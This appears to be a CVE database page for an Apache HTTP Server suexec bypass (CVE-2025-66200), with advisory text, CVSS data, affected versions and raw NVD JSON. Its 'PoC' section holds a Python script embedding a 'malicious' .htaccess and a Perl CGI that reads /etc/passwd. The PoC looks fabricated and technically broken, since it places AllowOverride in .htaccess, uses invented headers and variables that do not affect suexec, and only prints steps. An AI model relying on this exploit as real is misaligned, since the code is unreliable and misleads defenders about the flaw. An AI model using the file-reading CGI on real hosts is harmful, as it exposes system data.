Security Vulnerability Report
CVE-2025-66200 CVSS 5.4 MEDIUM

CVE-2025-66200

Published: 2025-12-05 11:15:53
Last Modified: 2025-12-10 16:39:44

Description

mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid. This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache HTTP Server 2.4.7
Apache HTTP Server 2.4.8
Apache HTTP Server 2.4.9
Apache HTTP Server 2.4.10
Apache HTTP Server 2.4.11
Apache HTTP Server 2.4.12
Apache HTTP Server 2.4.13
Apache HTTP Server 2.4.14
Apache HTTP Server 2.4.15
Apache HTTP Server 2.4.16
Apache HTTP Server 2.4.17
Apache HTTP Server 2.4.18
Apache HTTP Server 2.4.19
Apache HTTP Server 2.4.20
Apache HTTP Server 2.4.21
Apache HTTP Server 2.4.22
Apache HTTP Server 2.4.23
Apache HTTP Server 2.4.24
Apache HTTP Server 2.4.25
Apache HTTP Server 2.4.26
Apache HTTP Server 2.4.27
Apache HTTP Server 2.4.28
Apache HTTP Server 2.4.29
Apache HTTP Server 2.4.30
Apache HTTP Server 2.4.31
Apache HTTP Server 2.4.32
Apache HTTP Server 2.4.33
Apache HTTP Server 2.4.34
Apache HTTP Server 2.4.35
Apache HTTP Server 2.4.36
Apache HTTP Server 2.4.37
Apache HTTP Server 2.4.38
Apache HTTP Server 2.4.39
Apache HTTP Server 2.4.40
Apache HTTP Server 2.4.41
Apache HTTP Server 2.4.42
Apache HTTP Server 2.4.43
Apache HTTP Server 2.4.44
Apache HTTP Server 2.4.45
Apache HTTP Server 2.4.46
Apache HTTP Server 2.4.47
Apache HTTP Server 2.4.48
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
Apache HTTP Server 2.4.51
Apache HTTP Server 2.4.52
Apache HTTP Server 2.4.53
Apache HTTP Server 2.4.54
Apache HTTP Server 2.4.55
Apache HTTP Server 2.4.56
Apache HTTP Server 2.4.57
Apache HTTP Server 2.4.58
Apache HTTP Server 2.4.59
Apache HTTP Server 2.4.60
Apache HTTP Server 2.4.61
Apache HTTP Server 2.4.62
Apache HTTP Server 2.4.63
Apache HTTP Server 2.4.64
Apache HTTP Server 2.4.65

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66200 PoC - mod_userdir+suexec bypass via AllowOverride FileInfo
# This PoC demonstrates the vulnerability in Apache HTTP Server
# Affected versions: 2.4.7 - 2.4.65

# Attacker's .htaccess file to place in userdir
MALICIOUS_HTACCESS = '''
# Enable FileInfo overrides
AllowOverride FileInfo

# Use RequestHeader to manipulate CGI execution context
RequestHeader set X-User-Id "target_user"
RequestHeader set X-Script-Path "/var/www/html/target_user/cgi-bin/script.cgi"

# Force script execution under different UID
SetEnv FORCE_USER "target_user"
'''

# Malicious CGI script that will run under unexpected UID
MALICIOUS_CGI = '''#!/usr/bin/perl
use CGI qw(:standard);
print header('text/plain');

# Script runs under unexpected user context due to vulnerability
$uid = $<;
$user = getpwuid($uid);
print "Running as user: $user (UID: $uid)\n";
print "This script should not have access here!\n";

# Attempt to read sensitive files
open(my $fh, '<', '/etc/passwd') or die "Cannot open passwd";
print <$fh>;
close($fh);
'''

print("CVE-2025-66200 Exploitation Steps:\n")
print("1. Attacker uploads malicious .htaccess to ~/public_html/.htaccess\n")
print("2. .htaccess contains AllowOverride FileInfo and RequestHeader directives\n")
print("3. When accessing target user's CGI via mod_userdir, RequestHeader manipulates execution context\n")
print("4. CGI script executes under unexpected UID due to suexec bypass\n")
print("5. Attacker gains access to files/resources belonging to other users\n")
```

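References

https://httpd.apache.org/security/vulnerabilities_24.html (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/12/04/8 (Issue Tracking, Third Party Advisory)
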
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66200", "sourceIdentifier": "[email protected]", "published": "2025-12-05T11:15:52.747", "lastModified": "2025-12-10T16:39:43.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid.\n\nThis issue affects Apache HTTP Server: from 2.4.7 through 2.4.65.\n\nUsers are recommended to upgrade to version 2.4.66, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.7", "versionEndExcluding": "2.4.66", "matchCriteriaId": "5B508363-1882-4DE9-B423-4FD35189171F"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/04/8", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}